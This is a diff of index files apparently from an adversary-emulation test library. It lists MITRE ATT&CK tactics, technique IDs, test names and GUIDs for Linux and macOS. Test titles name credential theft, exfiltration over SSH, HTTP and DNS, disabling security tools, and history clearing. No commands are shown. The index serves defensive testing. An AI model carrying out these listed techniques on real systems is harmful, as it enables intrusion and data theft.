persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
persistence T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
persistence T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
133 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
134 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
135 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
136 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
137 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
138 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
139 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
command-and-control T1090.003 Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
140 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
141 command-and-control T1132.001 Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
142 command-and-control T1071.001 Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
143 collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
144 collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
145 collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
146 collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
147 collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
148 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
149 collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
150 execution T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
execution T1609 Container Administration Command 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
execution T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
execution T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
151 execution T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
152 execution T1053.003 Cron 2 Cron - Add script to all cron subfolders Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
execution T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
execution T1059.006 Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
execution T1059.006 Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
execution T1059.006 Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
execution T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
execution T1053.006 Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
execution T1053.006 Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
153 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
154 execution T1059.004 Unix Shell 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
execution T1059.004 Unix Shell 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
execution T1059.004 Unix Shell 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
155 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
156 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
157 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
exfiltration T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
158 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
159 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
initial-access T1078.004 Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e gcloud
atomics/Indexes/Indexes-CSV/macos-index.csv
+53 -73
View File
@@ -1,35 +1,15 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
@@ -40,23 +20,36 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
persistence,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1027.004,Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1562.001,Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
@@ -65,6 +58,8 @@ defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
@@ -72,9 +67,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ec
defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
@@ -84,16 +77,13 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1027.002,Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -109,9 +99,9 @@ impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Lin
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Diectory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
@@ -127,42 +117,18 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1016,System Network Configuration Discovery,6,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1569.001,Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
@@ -173,16 +139,30 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
